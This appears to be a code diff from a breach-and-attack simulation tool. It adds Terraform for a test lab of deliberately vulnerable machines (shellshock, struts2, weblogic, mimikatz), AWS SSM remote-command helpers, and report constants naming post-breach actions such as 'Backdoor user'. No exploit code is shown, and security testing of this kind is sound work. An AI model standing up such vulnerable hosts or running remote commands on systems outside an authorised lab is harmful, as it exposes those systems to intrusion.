name = "${local.resource_prefix}tunneling2-in"
network = "${google_compute_network.tunneling2.name}"
allow {
protocol = "all"
}
direction = "INGRESS"
source_ranges = ["10.2.0.0/24"]
}
resource "google_compute_firewall" "tunneling2-out" {
name = "${local.resource_prefix}tunneling2-out"
network = "${google_compute_network.tunneling2.name}"
allow {
protocol = "all"
}
direction = "EGRESS"
destination_ranges = ["10.2.0.0/24"]
}

View File

@ -0,0 +1,95 @@
//Custom cloud images
data "google_compute_image" "hadoop-2" {
name = "hadoop-2"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "hadoop-3" {
name = "hadoop-3"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "elastic-4" {
name = "elastic-4"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "elastic-5" {
name = "elastic-5"
project = "${local.monkeyzoo_project}"
}
/*
data "google_compute_image" "sambacry-6" {
name = "sambacry-6"
}
*/
data "google_compute_image" "shellshock-8" {
name = "shellshock-8"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "tunneling-9" {
name = "tunneling-9"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "tunneling-10" {
name = "tunneling-10"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "tunneling-11" {
name = "tunneling-11"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "sshkeys-11" {
name = "sshkeys-11"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "sshkeys-12" {
name = "sshkeys-12"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "mimikatz-14" {
name = "mimikatz-14"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "mimikatz-15" {
name = "mimikatz-15"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "mssql-16" {
name = "mssql-16"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "weblogic-18" {
name = "weblogic-18"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "weblogic-19" {
name = "weblogic-19"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "smb-20" {
name = "smb-20"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "scan-21" {
name = "scan-21"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "scan-22" {
name = "scan-22"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "struts2-23" {
name = "struts2-23"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "struts2-24" {
name = "struts2-24"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "island-linux-250" {
name = "island-linux-250"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "island-windows-251" {
name = "island-windows-251"
project = "${local.monkeyzoo_project}"
}

View File

@ -0,0 +1,460 @@
// Local variables
locals {
default_ubuntu="${google_compute_instance_template.ubuntu16.self_link}"
default_windows="${google_compute_instance_template.windows2016.self_link}"
}
resource "google_compute_network" "monkeyzoo" {
name = "${local.resource_prefix}monkeyzoo"
auto_create_subnetworks = false
}
resource "google_compute_network" "tunneling" {
name = "${local.resource_prefix}tunneling"
auto_create_subnetworks = false
}
resource "google_compute_network" "tunneling2" {
name = "${local.resource_prefix}tunneling2"
auto_create_subnetworks = false
}
resource "google_compute_subnetwork" "monkeyzoo-main" {
name = "${local.resource_prefix}monkeyzoo-main"
ip_cidr_range = "10.2.2.0/24"
network = "${google_compute_network.monkeyzoo.self_link}"
}
resource "google_compute_subnetwork" "tunneling-main" {
name = "${local.resource_prefix}tunneling-main"
ip_cidr_range = "10.2.1.0/28"
network = "${google_compute_network.tunneling.self_link}"
}
resource "google_compute_subnetwork" "tunneling2-main" {
name = "${local.resource_prefix}tunneling2-main"
ip_cidr_range = "10.2.0.0/27"
network = "${google_compute_network.tunneling2.self_link}"
}
resource "google_compute_instance_from_template" "hadoop-2" {
name = "${local.resource_prefix}hadoop-2"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.hadoop-2.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.2"
}
// Add required ssh keys for hadoop service and restart it
metadata_startup_script = "[ ! -f /home/vakaris_zilius/.ssh/authorized_keys ] && sudo cat /home/vakaris_zilius/.ssh/id_rsa.pub >> /home/vakaris_zilius/.ssh/authorized_keys && sudo reboot"
}
resource "google_compute_instance_from_template" "hadoop-3" {
name = "${local.resource_prefix}hadoop-3"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.hadoop-3.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.3"
}
}
resource "google_compute_instance_from_template" "elastic-4" {
name = "${local.resource_prefix}elastic-4"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.elastic-4.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.4"
}
}
resource "google_compute_instance_from_template" "elastic-5" {
name = "${local.resource_prefix}elastic-5"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.elastic-5.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.5"
}
}
/* Couldn't find ubuntu packages for required samba version (too old).
resource "google_compute_instance_from_template" "sambacry-6" {
name = "${local.resource_prefix}sambacry-6"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.sambacry-6.self_link}"
}
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.6"
}
}
*/
/* We need custom 32 bit Ubuntu machine for this (there are no 32 bit ubuntu machines in GCP).
resource "google_compute_instance_from_template" "sambacry-7" {
name = "${local.resource_prefix}sambacry-7"
source_instance_template = "${local.default_ubuntu}"
boot_disk {
initialize_params {
// Add custom image to cloud
image = "ubuntu32"
}
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.7"
}
}
*/
resource "google_compute_instance_from_template" "shellshock-8" {
name = "${local.resource_prefix}shellshock-8"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.shellshock-8.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.8"
}
}
resource "google_compute_instance_from_template" "tunneling-9" {
name = "${local.resource_prefix}tunneling-9"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.tunneling-9.self_link}"
}
auto_delete = true
}
network_interface{
subnetwork="${local.resource_prefix}tunneling-main"
network_ip="10.2.1.9"
}
network_interface{
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.9"
}
}
resource "google_compute_instance_from_template" "tunneling-10" {
name = "${local.resource_prefix}tunneling-10"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.tunneling-10.self_link}"
}
auto_delete = true
}
network_interface{
subnetwork="${local.resource_prefix}tunneling-main"
network_ip="10.2.1.10"
}
network_interface{
subnetwork="${local.resource_prefix}tunneling2-main"
network_ip="10.2.0.10"
}
}
resource "google_compute_instance_from_template" "tunneling-11" {
name = "${local.resource_prefix}tunneling-11"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.tunneling-11.self_link}"
}
auto_delete = true
}
network_interface{
subnetwork="${local.resource_prefix}tunneling2-main"
network_ip="10.2.0.11"
}
}
resource "google_compute_instance_from_template" "sshkeys-11" {
name = "${local.resource_prefix}sshkeys-11"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.sshkeys-11.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.11"
}
}
resource "google_compute_instance_from_template" "sshkeys-12" {
name = "${local.resource_prefix}sshkeys-12"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.sshkeys-12.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.12"
}
}
/*
resource "google_compute_instance_from_template" "rdpgrinder-13" {
name = "${local.resource_prefix}rdpgrinder-13"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.rdpgrinder-13.self_link}"
}
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.13"
}
}
*/
resource "google_compute_instance_from_template" "mimikatz-14" {
name = "${local.resource_prefix}mimikatz-14"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.mimikatz-14.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.14"
}
}
resource "google_compute_instance_from_template" "mimikatz-15" {
name = "${local.resource_prefix}mimikatz-15"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.mimikatz-15.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.15"
}
}
resource "google_compute_instance_from_template" "mssql-16" {
name = "${local.resource_prefix}mssql-16"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.mssql-16.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.16"
}
}
/* We need to alter monkey's behavior for this to upload 32-bit monkey instead of 64-bit (not yet developed)
resource "google_compute_instance_from_template" "upgrader-17" {
name = "${local.resource_prefix}upgrader-17"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.upgrader-17.self_link}"
}
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.17"
access_config {
// Cheaper, non-premium routing
network_tier = "STANDARD"
}
}
}
*/
resource "google_compute_instance_from_template" "weblogic-18" {
name = "${local.resource_prefix}weblogic-18"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.weblogic-18.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.18"
}
}
resource "google_compute_instance_from_template" "weblogic-19" {
name = "${local.resource_prefix}weblogic-19"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.weblogic-19.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.19"
}
}
resource "google_compute_instance_from_template" "smb-20" {
name = "${local.resource_prefix}smb-20"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.smb-20.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.20"
}
}
resource "google_compute_instance_from_template" "scan-21" {
name = "${local.resource_prefix}scan-21"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.scan-21.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.21"
}
}
resource "google_compute_instance_from_template" "scan-22" {
name = "${local.resource_prefix}scan-22"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.scan-22.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.22"
}
}
resource "google_compute_instance_from_template" "struts2-23" {
name = "${local.resource_prefix}struts2-23"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.struts2-23.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.23"
}
}
resource "google_compute_instance_from_template" "struts2-24" {
name = "${local.resource_prefix}struts2-24"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.struts2-24.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.24"
}
}
resource "google_compute_instance_from_template" "island-linux-250" {
name = "${local.resource_prefix}island-linux-250"
machine_type = "n1-standard-2"
tags = ["island", "linux", "ubuntu16"]
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.island-linux-250.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.250"
access_config {
// Cheaper, non-premium routing (not available in some regions)
// network_tier = "STANDARD"
}
}
}
resource "google_compute_instance_from_template" "island-windows-251" {
name = "${local.resource_prefix}island-windows-251"
machine_type = "n1-standard-2"
tags = ["island", "windows", "windowsserver2016"]
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.island-windows-251.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.251"
access_config {
// Cheaper, non-premium routing (not available in some regions)
// network_tier = "STANDARD"
}
}
}

View File

@ -0,0 +1,45 @@
resource "google_compute_instance_template" "ubuntu16" {
name = "${local.resource_prefix}ubuntu16"
description = "Creates ubuntu 16.04 LTS servers at europe-west3-a."
tags = ["test-machine", "ubuntu16", "linux"]
machine_type = "n1-standard-1"
can_ip_forward = false
disk {
source_image = "ubuntu-os-cloud/ubuntu-1604-lts"
}
network_interface {
subnetwork="monkeyzoo-main"
access_config {
// Cheaper, non-premium routing
network_tier = "STANDARD"
}
}
service_account {
email ="${local.service_account_email}"
scopes=["cloud-platform"]
}
}
resource "google_compute_instance_template" "windows2016" {
name = "${local.resource_prefix}windows2016"
description = "Creates windows 2016 core servers at europe-west3-a."
tags = ["test-machine", "windowsserver2016", "windows"]
machine_type = "n1-standard-1"
can_ip_forward = false
disk {
source_image = "windows-cloud/windows-2016"
}
network_interface {
subnetwork="monkeyzoo-main"
}
service_account {
email="${local.service_account_email}"
scopes=["cloud-platform"]
}
}

View File

@ -0,0 +1 @@
__author__ = 'itay.mizeretz'

View File

@ -0,0 +1,79 @@
import json
import re
import urllib2
import logging
__author__ = 'itay.mizeretz'
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId"
logger = logging.getLogger(__name__)
class AwsInstance(object):
"""
Class which gives useful information about the current instance you're on.
"""
def __init__(self):
self.instance_id = None
self.region = None
self.account_id = None
try:
self.instance_id = urllib2.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read()
self.region = self._parse_region(
urllib2.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read())
except (urllib2.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message), exc_info=True)
try:
self.account_id = self._extract_account_id(
urllib2.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read())
except (urllib2.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e.message))
@staticmethod
def _parse_region(region_url_response):
# For a list of regions, see:
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
# This regex will find any AWS region format string in the response.
re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
if finding:
return finding[0]
else:
return None
def get_instance_id(self):
return self.instance_id
def get_region(self):
return self.region
def is_aws_instance(self):
return self.instance_id is not None
@staticmethod
def _extract_account_id(instance_identity_document_response):
"""
Extracts the account id from the dynamic/instance-identity/document metadata path.
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more solutions,
in case Amazon breaks this mechanism.
:param instance_identity_document_response: json returned via the web page ../dynamic/instance-identity/document
:return: The account id
"""
return json.loads(instance_identity_document_response)[ACCOUNT_ID_KEY]
def get_account_id(self):
"""
:return: the AWS account ID which "owns" this instance.
See https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html
"""
return self.account_id
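
A hedged sketch of consulting the class at runtime; off EC2 the metadata requests fail quietly, so is_aws_instance() simply returns False:

    # Values are populated from the instance metadata service when running on EC2.
    aws = AwsInstance()
    if aws.is_aws_instance():
        print("instance: %s, region: %s, account: %s" %
              (aws.get_instance_id(), aws.get_region(), aws.get_account_id()))
    else:
        print("Not running on an AWS EC2 instance")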

View File

@ -0,0 +1,88 @@
import logging
import boto3
import botocore
from botocore.exceptions import ClientError
from common.cloud.aws_instance import AwsInstance
__author__ = ['itay.mizeretz', 'shay.nehmad']
INSTANCE_INFORMATION_LIST_KEY = 'InstanceInformationList'
INSTANCE_ID_KEY = 'InstanceId'
COMPUTER_NAME_KEY = 'ComputerName'
PLATFORM_TYPE_KEY = 'PlatformType'
IP_ADDRESS_KEY = 'IPAddress'
logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
return [{
'instance_id': x[INSTANCE_ID_KEY],
'name': x[COMPUTER_NAME_KEY],
'os': x[PLATFORM_TYPE_KEY].lower(),
'ip_address': x[IP_ADDRESS_KEY]
} for x in response[INSTANCE_INFORMATION_LIST_KEY]]
class AwsService(object):
"""
A wrapper class around the boto3 client and session modules, which supplies various AWS services.
This class will assume:
1. That it's running on an EC2 instance
2. That the instance is associated with the correct IAM role. See
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
"""
region = None
@staticmethod
def set_region(region):
AwsService.region = region
@staticmethod
def get_client(client_type, region=None):
return boto3.client(
client_type,
region_name=region if region is not None else AwsService.region)
@staticmethod
def get_session():
return boto3.session.Session()
@staticmethod
def get_regions():
return AwsService.get_session().get_available_regions('ssm')
@staticmethod
def test_client():
try:
AwsService.get_client('ssm').describe_instance_information()
return True
except ClientError:
return False
@staticmethod
def get_instances():
"""
Get the information for all instances with the relevant roles.
This function will assume that it's running on an EC2 instance with the correct IAM role.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
:raises: botocore.exceptions.ClientError if can't describe local instance information.
:return: All visible instances from this instance
"""
current_instance = AwsInstance()
local_ssm_client = boto3.client("ssm", current_instance.get_region())
try:
response = local_ssm_client.describe_instance_information()
filtered_instances_data = filter_instance_data_from_aws_response(response)
return filtered_instances_data
except botocore.exceptions.ClientError as e:
logger.warning("AWS client error while trying to get instances: " + e.message)
raise e
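
A hedged sketch tying AwsService to AwsInstance; it assumes the code runs on an EC2 instance that carries the IAM role mentioned in the class docstring:

    # Illustrative only: list SSM-managed instances visible from this machine.
    AwsService.set_region(AwsInstance().get_region())
    if AwsService.test_client():
        for instance in AwsService.get_instances():
            print("%s (%s) at %s" % (instance['name'], instance['os'], instance['ip_address']))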

View File

@ -0,0 +1,59 @@
from unittest import TestCase
from aws_service import filter_instance_data_from_aws_response
import json
__author__ = 'shay.nehmad'
class TestFilterInstanceDataFromAwsResponse(TestCase):
def test_filter_instance_data_from_aws_response(self):
json_response_full = """
{
"InstanceInformationList": [
{
"ActivationId": "string",
"AgentVersion": "string",
"AssociationOverview": {
"DetailedStatus": "string",
"InstanceAssociationStatusAggregatedCount": {
"string" : 6
}
},
"AssociationStatus": "string",
"ComputerName": "string",
"IamRole": "string",
"InstanceId": "string",
"IPAddress": "string",
"IsLatestVersion": "True",
"LastAssociationExecutionDate": 6,
"LastPingDateTime": 6,
"LastSuccessfulAssociationExecutionDate": 6,
"Name": "string",
"PingStatus": "string",
"PlatformName": "string",
"PlatformType": "string",
"PlatformVersion": "string",
"RegistrationDate": 6,
"ResourceType": "string"
}
],
"NextToken": "string"
}
"""
json_response_empty = """
{
"InstanceInformationList": [],
"NextToken": "string"
}
"""
self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), [])
self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_full)),
[{'instance_id': u'string',
'ip_address': u'string',
'name': u'string',
'os': u'string'}])

View File

View File

View File

@ -0,0 +1,26 @@
from common.cmd.cmd_result import CmdResult
__author__ = 'itay.mizeretz'
class AwsCmdResult(CmdResult):
"""
Class representing an AWS command result
"""
def __init__(self, command_info):
super(AwsCmdResult, self).__init__(
self.is_successful(command_info, True), command_info[u'ResponseCode'], command_info[u'StandardOutputContent'],
command_info[u'StandardErrorContent'])
self.command_info = command_info
@staticmethod
def is_successful(command_info, is_timeout=False):
"""
Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
:param command_info: Command info struct (returned by ssm.get_command_invocation)
:param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise.
"""
return (command_info[u'Status'] == u'Success') or (is_timeout and (command_info[u'Status'] == u'InProgress'))

View File

@ -0,0 +1,42 @@
import logging
from common.cloud.aws_service import AwsService
from common.cmd.aws.aws_cmd_result import AwsCmdResult
from common.cmd.cmd_runner import CmdRunner
from common.cmd.cmd_status import CmdStatus
__author__ = 'itay.mizeretz'
logger = logging.getLogger(__name__)
class AwsCmdRunner(CmdRunner):
"""
Class for running commands on a remote AWS machine
"""
def __init__(self, is_linux, instance_id, region = None):
super(AwsCmdRunner, self).__init__(is_linux)
self.instance_id = instance_id
self.region = region
self.ssm = AwsService.get_client('ssm', region)
def query_command(self, command_id):
return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id)
def get_command_result(self, command_info):
return AwsCmdResult(command_info)
def get_command_status(self, command_info):
if command_info[u'Status'] == u'InProgress':
return CmdStatus.IN_PROGRESS
elif command_info[u'Status'] == u'Success':
return CmdStatus.SUCCESS
else:
return CmdStatus.FAILURE
def run_command_async(self, command_line):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command(DocumentName=doc_name, Parameters={'commands': [command_line]},
InstanceIds=[self.instance_id])
return command_res['Command']['CommandId']
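
A hedged sketch of running a single command through this runner; the instance id is a placeholder, and run_command comes from the CmdRunner base class added later in this commit:

    # Illustrative only: run one shell command on an SSM-managed Linux instance.
    runner = AwsCmdRunner(is_linux=True, instance_id='i-0123456789abcdef0')  # placeholder id
    result = runner.run_command('echo hello', timeout=30)
    if result.is_success:
        print(result.stdout)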

11
monkey/common/cmd/cmd.py Normal file
View File

@ -0,0 +1,11 @@
__author__ = 'itay.mizeretz'
class Cmd(object):
"""
Class representing a command
"""
def __init__(self, cmd_runner, cmd_id):
self.cmd_runner = cmd_runner
self.cmd_id = cmd_id

View File

@ -0,0 +1,13 @@
__author__ = 'itay.mizeretz'
class CmdResult(object):
"""
Class representing a command result
"""
def __init__(self, is_success, status_code=None, stdout=None, stderr=None):
self.is_success = is_success
self.status_code = status_code
self.stdout = stdout
self.stderr = stderr

View File

@ -0,0 +1,158 @@
import time
import logging
from abc import abstractmethod
from common.cmd.cmd import Cmd
from common.cmd.cmd_result import CmdResult
from common.cmd.cmd_status import CmdStatus
__author__ = 'itay.mizeretz'
logger = logging.getLogger(__name__)
class CmdRunner(object):
"""
Interface for running commands on a remote machine
Since these classes are a bit complex, I provide a list of common terminology and formats:
* command line - a command line. e.g. 'echo hello'
* command - represent a single command which was already run. Always of type Cmd
* command id - any unique identifier of a command which was already run
* command result - represents the result of running a command. Always of type CmdResult
* command status - represents the current status of a command. Always of type CmdStatus
* command info - Any consistent structure representing additional information of a command which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
* instance_id - any unique identifier of an instance (machine). Can be of any format
"""
# Default command timeout in seconds
DEFAULT_TIMEOUT = 5
# Time to sleep when waiting on commands.
WAIT_SLEEP_TIME = 1
def __init__(self, is_linux):
self.is_linux = is_linux
def run_command(self, command_line, timeout=DEFAULT_TIMEOUT):
"""
Runs the given command on the remote machine
:param command_line: The command line to run
:param timeout: Timeout in seconds for command.
:return: Command result
"""
c_id = self.run_command_async(command_line)
return self.wait_commands([Cmd(self, c_id)], timeout)[0][1]
@staticmethod
def run_multiple_commands(instances, inst_to_cmd, inst_n_cmd_res_to_res):
"""
Run multiple commands on various instances
:param instances: List of instances.
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
:param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
and returns a parsed result (of any format)
:return: Dictionary with 'instance_id' as key and parsed result as value
"""
command_instance_dict = {}
for instance in instances:
command = inst_to_cmd(instance)
command_instance_dict[command] = instance
instance_results = {}
command_result_pairs = CmdRunner.wait_commands(command_instance_dict.keys())
for command, result in command_result_pairs:
instance = command_instance_dict[command]
instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)
return instance_results
@abstractmethod
def run_command_async(self, command_line):
"""
Runs the given command on the remote machine asynchronously.
:param command_line: The command line to run
:return: Command ID (in any format)
"""
raise NotImplementedError()
@staticmethod
def wait_commands(commands, timeout=DEFAULT_TIMEOUT):
"""
Waits on all commands up to given timeout
:param commands: list of commands (of type Cmd)
:param timeout: Timeout in seconds for command.
:return: commands and their results (a list of (Cmd, CmdResult) tuples)
"""
init_time = time.time()
curr_time = init_time
results = []
while (curr_time - init_time < timeout) and (len(commands) != 0):
for command in list(commands): # list(commands) clones the list. We do so because we remove items inside
CmdRunner._process_command(command, commands, results, True)
time.sleep(CmdRunner.WAIT_SLEEP_TIME)
curr_time = time.time()
for command in list(commands):
CmdRunner._process_command(command, commands, results, False)
for command, result in results:
if not result.is_success:
logger.error('The following command failed: `%s`. status code: %s',
str(command.cmd_id), str(result.status_code))
return results
@abstractmethod
def query_command(self, command_id):
"""
Queries the already run command for more info
:param command_id: The command ID to query
:return: Command info (in any format)
"""
raise NotImplementedError()
@abstractmethod
def get_command_result(self, command_info):
"""
Gets the result of the already run command
:param command_info: The command info of the command to get the result of
:return: CmdResult
"""
raise NotImplementedError()
@abstractmethod
def get_command_status(self, command_info):
"""
Gets the status of the already run command
:param command_info: The command info of the command to get the result of
:return: CmdStatus
"""
raise NotImplementedError()
@staticmethod
def _process_command(command, commands, results, should_process_only_finished):
"""
Removes the command from the list, processes its result and appends to results
:param command: Command to process. Must be in commands.
:param commands: List of unprocessed commands.
:param results: List of command results.
:param should_process_only_finished: If True, processes only if command finished.
:return: None
"""
c_runner = command.cmd_runner
c_id = command.cmd_id
try:
command_info = c_runner.query_command(c_id)
if (not should_process_only_finished) or c_runner.get_command_status(command_info) != CmdStatus.IN_PROGRESS:
commands.remove(command)
results.append((command, c_runner.get_command_result(command_info)))
except Exception:
logger.exception('Exception while querying command: `%s`', str(c_id))
if not should_process_only_finished:
commands.remove(command)
results.append((command, CmdResult(False)))
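A minimal usage sketch of the runner interface above (Python 2, like the rest of this changeset); DummyRunner, the instance dicts and the cmd_runner module name are assumptions for illustration, not part of this diff:
# Hypothetical usage sketch -- DummyRunner and the instance dicts are illustrative only.
from common.cmd.cmd import Cmd
from common.cmd.cmd_result import CmdResult
from common.cmd.cmd_status import CmdStatus
from common.cmd.cmd_runner import CmdRunner  # assumed module name for the class above

class DummyRunner(CmdRunner):
    """Toy runner that pretends every command succeeds immediately."""
    def run_command_async(self, command_line):
        return command_line                      # the command line doubles as the command id
    def query_command(self, command_id):
        return {'id': command_id}                # command info is a plain dict
    def get_command_result(self, command_info):
        return CmdResult(True, 0, stdout='ok')
    def get_command_status(self, command_info):
        return CmdStatus.SUCCESS

instances = [{'instance_id': 'i-1'}, {'instance_id': 'i-2'}]
runner = DummyRunner(is_linux=True)
results = CmdRunner.run_multiple_commands(
    instances,
    lambda instance: Cmd(runner, runner.run_command_async('echo hello')),
    lambda instance, cmd_res: cmd_res.stdout)
# results == {'i-1': 'ok', 'i-2': 'ok'}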

View File

@ -0,0 +1,9 @@
from enum import Enum
__author__ = 'itay.mizeretz'
class CmdStatus(Enum):
IN_PROGRESS = 0
SUCCESS = 1
FAILURE = 2

View File

@ -0,0 +1,2 @@
from zero_trust_consts import populate_mappings
populate_mappings()

View File

@ -0,0 +1,2 @@
ES_SERVICE = 'elastic-search-9200'

View File

@ -0,0 +1,3 @@
POST_BREACH_COMMUNICATE_AS_NEW_USER = "Communicate as new user"
POST_BREACH_BACKDOOR_USER = "Backdoor user"
POST_BREACH_FILE_EXECUTION = "File execution"

View File

@ -0,0 +1,205 @@
"""
This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
in creating findings.
This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
Some of the mappings are computed when this module is loaded.
"""
AUTOMATION_ORCHESTRATION = u"Automation & Orchestration"
VISIBILITY_ANALYTICS = u"Visibility & Analytics"
WORKLOADS = u"Workloads"
DEVICES = u"Devices"
NETWORKS = u"Networks"
PEOPLE = u"People"
DATA = u"Data"
PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)
STATUS_UNEXECUTED = u"Unexecuted"
STATUS_PASSED = u"Passed"
STATUS_VERIFY = u"Verify"
STATUS_FAILED = u"Failed"
# Don't change order! The statuses are ordered by importance/severity.
ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED]
TEST_DATA_ENDPOINT_ELASTIC = u"unencrypted_data_endpoint_elastic"
TEST_DATA_ENDPOINT_HTTP = u"unencrypted_data_endpoint_http"
